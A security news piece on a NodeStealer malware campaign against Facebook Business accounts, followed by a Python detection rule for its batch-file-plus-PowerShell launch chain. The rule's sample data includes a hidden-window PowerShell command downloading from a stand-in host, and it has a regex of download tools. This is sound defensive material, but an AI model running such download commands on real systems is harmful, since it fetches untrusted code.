NodeStealer Takes Aim at Business Accounts on Facebook

How Identity Thieves Steal Information

In an ongoing campaign, Facebook Business accounts are being targeted with deceptive messages aimed at collecting victims' credentials. These messages are part of a campaign utilizing a variant of the Python-based NodeStealer malware, potentially allowing attackers to gain control of these accounts for subsequent malicious activities.

According to Jan Michael, a researcher at Netskope Threat Labs, the attacks are primarily affecting victims in Southern Europe and North America, spanning various industries but with a particular focus on manufacturing services and technology sectors.

NodeStealer, initially identified by Meta in May 2023, was originally a JavaScript-based malware designed to steal cookies and passwords from web browsers, compromising accounts on platforms like Facebook, Gmail, and Outlook.

Palo Alto Networks Unit 42 recently disclosed a separate attack wave that occurred in December 2022, involving a Python version of NodeStealer, some samples of which had been adapted to facilitate cryptocurrency theft.

Netskope's latest findings suggest that the Vietnamese threat actors responsible for these attacks have likely resumed their efforts, and they may have adopted tactics used by other threat actors in the same region with similar objectives.

NodeStealer Delivered in Archives Over Malicious Messages

Earlier this week, Guardio Labs revealed a related tactic involving fraudulent messages sent via Facebook Messenger, originating from a botnet of fake and compromised personal accounts. These messages deliver ZIP or RAR archive files containing the NodeStealer malware to unsuspecting recipients.

This same method serves as the initial means to distribute RAR files hosted on Facebook's content delivery network (CDN). These archives use images of defective products as bait to persuade Facebook business page owners or admins to download the malware payload.

Upon execution, a batch script opens the Chrome web browser and redirects the victim to a benign web page. Simultaneously, a PowerShell command runs in the background to retrieve additional payloads, including the Python interpreter and the NodeStealer malware.

The NodeStealer malware, besides capturing credentials and cookies from various web browsers, is designed to collect system metadata and transmit this information over Telegram.

Compared to earlier versions, this new NodeStealer variant employs batch files to download and execute Python scripts, enabling it to steal credentials and cookies from multiple browsers and websites.
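The decoy chain described above (a batch file that opens a browser on a harmless page while PowerShell fetches a Python interpreter and the stealer) leaves a recognisable process lineage. The following is an added example, not code from the original article or from Netskope, that runs one such detection rule over constructed process-creation events: a cmd.exe running a .bat/.cmd file that, within a short window, spawns both a browser and a PowerShell download command. The event format, field names and sample URLs are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed, simplified process-creation events (Sysmon Event ID 1 style);
# not real telemetry from the campaign. Fields: time, pid, ppid, image, cmdline.
EVENTS = [
    {"time": "2023-09-15T10:00:00", "pid": 400, "ppid": 300, "image": "explorer.exe", "cmdline": "explorer.exe"},
    {"time": "2023-09-15T10:00:01", "pid": 410, "ppid": 400, "image": "cmd.exe",
     "cmdline": 'cmd.exe /c "C:\\Users\\u\\Downloads\\product_photos.bat"'},
    {"time": "2023-09-15T10:00:02", "pid": 411, "ppid": 410, "image": "chrome.exe",
     "cmdline": "chrome.exe https://www.example.invalid/"},
    {"time": "2023-09-15T10:00:02", "pid": 412, "ppid": 410, "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden Invoke-WebRequest -Uri https://cdn.example.invalid/python.zip -OutFile $env:TEMP\\python.zip"},
    # Benign batch job: spawns PowerShell, but no browser and no download cmdlet.
    {"time": "2023-09-15T11:00:00", "pid": 520, "ppid": 400, "image": "cmd.exe", "cmdline": 'cmd.exe /c "build.bat"'},
    {"time": "2023-09-15T11:00:01", "pid": 521, "ppid": 520, "image": "powershell.exe", "cmdline": "powershell.exe Get-Date"},
]

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}
DOWNLOAD_RE = re.compile(r"invoke-webrequest|downloadfile|downloadstring|start-bitstransfer|\bcurl\b|\bwget\b", re.I)
BATCH_RE = re.compile(r"\.(bat|cmd)\b", re.I)

def find_decoy_launch_chains(events, window_seconds=60):
    """Return PIDs of cmd.exe instances that ran a batch file and, within the
    window, spawned both a browser and a PowerShell that downloads content."""
    by_parent = defaultdict(list)
    for ev in events:
        by_parent[ev["ppid"]].append(ev)
    hits = []
    for ev in events:
        if ev["image"].lower() != "cmd.exe" or not BATCH_RE.search(ev["cmdline"]):
            continue
        start = datetime.fromisoformat(ev["time"])
        limit = start + timedelta(seconds=window_seconds)
        browser = downloader = False
        for child in by_parent[ev["pid"]]:
            t = datetime.fromisoformat(child["time"])
            if not (start <= t <= limit):
                continue
            img = child["image"].lower()
            if img in BROWSERS:
                browser = True
            elif img in ("powershell.exe", "pwsh.exe") and DOWNLOAD_RE.search(child["cmdline"]):
                downloader = True
        if browser and downloader:
            hits.append(ev["pid"])
    return hits

if __name__ == "__main__":
    print(find_decoy_launch_chains(EVENTS))  # → [410]
```

Only the first batch file trips the rule; the second spawns PowerShell without a browser or a download cmdlet, which keeps ordinary build scripts from alerting.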


September 15, 2023
